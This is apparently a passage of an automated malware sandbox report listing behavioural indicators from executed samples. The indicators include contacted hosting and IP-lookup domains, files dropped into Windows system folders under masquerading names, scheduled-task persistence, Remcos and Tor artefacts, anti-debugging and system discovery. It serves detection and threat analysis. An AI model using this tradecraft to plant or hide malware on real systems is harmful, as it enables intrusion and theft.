| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | freegeoip.app | N/A | N/A |
| N/A | freegeoip.app | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Obfuscated Files or Information: Command Obfuscation
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\SysWOW64\ruts\ssleay32.dll | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\CertificateServicesClient\ruts | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\devtun\RuntimeBroker.exe | C:\Users\Admin\AppData\Local\Temp\a\RuntimeBroker.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\MicrosoftProfile | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-certs | C:\Windows\System32\dllhost.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\unverified-microdesc-consensus.tmp | C:\Windows\system32\lsass.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdesc-consensus.tmp | C:\Windows\system32\lsass.exe | N/A |
| File created | C:\Windows\SysWOW64\ruts\11.reg | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| File created | C:\Windows\SysWOW64\ruts\rutserv.exe | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| File opened for modification | C:\Windows\System32\CatRoot2\dberr.txt | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\System32\Tasks\boleto | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\state.tmp | C:\Windows\system32\lsass.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-certs.tmp | C:\Windows\system32\lsass.exe | N/A |
| File opened for modification | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdescs.new | C:\Windows\system32\lsass.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\xda | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\lock | C:\Windows\system32\lsass.exe | N/A |
| File created | C:\Windows\SysWOW64\ruts\rfusclient.exe | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| File created | C:\Windows\SysWOW64\ruts\libeay32.dll | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\rutssvc64 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\devtun\RuntimeBroker.exe | C:\Users\Admin\AppData\Local\Temp\a\RuntimeBroker.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdesc-consensus | C:\Windows\System32\dllhost.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
Suspicious use of SetThreadContext
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File created | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File created | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe | N/A |
| File created | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\graph | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\graph | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe | N/A |
| File created | C:\Windows\Installer\e5a7e3a.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\e5a7e3a.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
Access Token Manipulation: Create Process with Token
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Event Triggered Execution: Installer Packages
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\daytjhasdawd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\systeminfo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\50to.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\systeminfo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\Remcos\remcos.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\random.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\curl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\50.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\vcredist_x86.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\curl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-O26NE.tmp\jy.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\curl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\kisteruop.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\ScreenUpdateSync.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\curl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\mfcthased.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WerFault.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
System Network Configuration Discovery: Wi-Fi Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key security queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\systeminfo.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\systeminfo.exe | N/A |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
GoLang User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
